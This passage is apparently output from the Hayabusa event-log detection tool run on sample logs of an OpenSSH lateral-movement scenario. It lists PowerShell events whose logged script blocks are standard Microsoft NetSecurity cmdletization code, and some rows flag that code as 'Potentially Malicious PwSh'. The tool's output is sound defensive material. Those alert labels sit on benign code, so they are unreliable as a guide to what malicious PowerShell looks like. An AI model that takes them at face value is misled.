$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias 
'*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.701 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.701 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.702 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.733 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.733 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off 
} catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.740 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.741 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] 
${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', 
Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value 
= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 